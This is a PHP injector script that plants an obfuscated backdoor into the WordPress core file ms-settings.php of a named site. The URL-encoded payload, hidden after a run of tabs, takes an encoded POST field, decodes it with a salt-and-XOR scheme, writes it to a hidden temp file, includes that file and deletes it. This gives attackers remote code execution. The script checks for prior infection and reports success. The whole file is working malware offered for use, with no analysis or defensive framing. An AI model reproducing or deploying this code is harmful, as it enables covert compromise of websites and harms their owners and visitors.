<?php  $path = '/var/www/vhost/www.mocrea.it/dev/wp-includes/ms-settings.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28isset%28%24_POST%29%20%26%26%20isset%28%24_POST%5B%22%5Cx76a%5Cx6Cue%22%5D%29%29%7B%20%24data%20%3D%20%24_POST%5B%22%5Cx76a%5Cx6Cue%22%5D%3B%20%24data%20%3D%20explode%20%28%20%27.%27%20%2C%20%24data%20%29%20%3B%20%24hld%20%3D%20%27%27%3B%20%24salt2%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24lenS%20%3D%20strlen%28%24salt2%29%3B%20%24y%20%3D%200%3B%20while%28%24y%20%3Ccount%28%24data%29%29%20%7B%20%24v1%20%3D%20%24data%5B%24y%5D%3B%20%24sChar%20%3D%20ord%28%24salt2%5B%24y%20%25%20%24lenS%5D%29%3B%20%24dec%20%3D%28%28int%29%24v1%20-%20%24sChar%20-%28%24y%20%25%2010%29%29%20%5E%2060%3B%20%24hld%20.%3D%20chr%28%24dec%29%3B%20%24y%2B%2B%3B%7D%20%24ent%20%3D%20array_filter%28%5Bgetcwd%28%29%2C%20getenv%28%22TEMP%22%29%2C%20%22/var/tmp%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/dev/shm%22%2C%20sys_get_temp_dir%28%29%2C%20%22/tmp%22%2C%20session_save_path%28%29%2C%20getenv%28%22TMP%22%29%5D%29%3B%20foreach%20%28%24ent%20as%20%24pset%29%3A%20if%20%28%28is_dir%28%24pset%29%20and%20is_writable%28%24pset%29%29%29%20%7B%20%24element%20%3D%20vsprintf%28%22%25s/%25s%22%2C%20%5B%24pset%2C%20%22.val%22%5D%29%3B%20if%20%28file_put_contents%28%24element%2C%20%24hld%29%29%20%7B%20include%20%24element%3B%20%40unlink%28%24element%29%3B%20exit%3B%20%7D%20%7D%20endforeach%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');